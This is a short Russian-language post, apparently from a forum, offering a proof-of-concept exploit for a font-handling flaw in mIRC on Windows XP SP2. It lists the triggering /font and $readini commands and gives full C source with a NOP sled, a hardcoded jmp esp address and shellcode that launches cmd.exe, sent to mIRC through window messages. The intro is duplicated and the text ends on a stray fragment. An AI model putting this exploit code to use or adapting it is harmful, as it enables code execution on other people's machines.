mIRC font exploit XP SP2
Сплойт основан на некорректной обработке фонтов в мирке.
Некорректные команды:
*****************
/font -z $readini(c:\a\a.ini,aaaaaaa ,aaaa)
или
$readini(c:\a\a.ini,aaaaaaa ,aaaa)
*****************
Сам сплойт:
Сплойт основан на некорректной обработке фонтов в мирке.
Некорректные команды:
*****************
/font -z $readini(c:\a\a.ini,aaaaaaa ,aaaa)
или
$readini(c:\a\a.ini,aaaaaaa ,aaaa)
*****************
Сам сплойт:
Код:
/*
mircfontexploitXPSP2.c
This PoC it's for XP SP2 English
Special thanks to Racy from irc-hispano
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
int main () {
HWND lHandle;
char command[512]= "/font -z $null";
char strClass[30];
char buffer[128]=
"\x20\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char shellcode[999]=
"\x55"
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x04"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xBB\xc7\x93\xc2\x77"
"\xFF\xD3";
//Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 0x77c293c7
(WinXP Sp2 English)
char saltaoffset[]="\xD6\xD1\xE5\x77"; // jmp esp 0x77E5D1D6 (advapi32.dll)
SetForegroundWindow(lHandle);
lHandle = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);
if (!lHandle) { printf("Can't find mIRC\n"); return 0; }
strcat(buffer,saltaoffset);
strcat(buffer,shellcode);
strcat(command,buffer);
printf("mIRC Font Command Exploit: %s\n", command);
SendMessage(lHandle, WM_SETTEXT,0,(LPARAM)command);
SendMessage (lHandle, WM_IME_KEYDOWN, VK_RETURN, 0);
}
ease: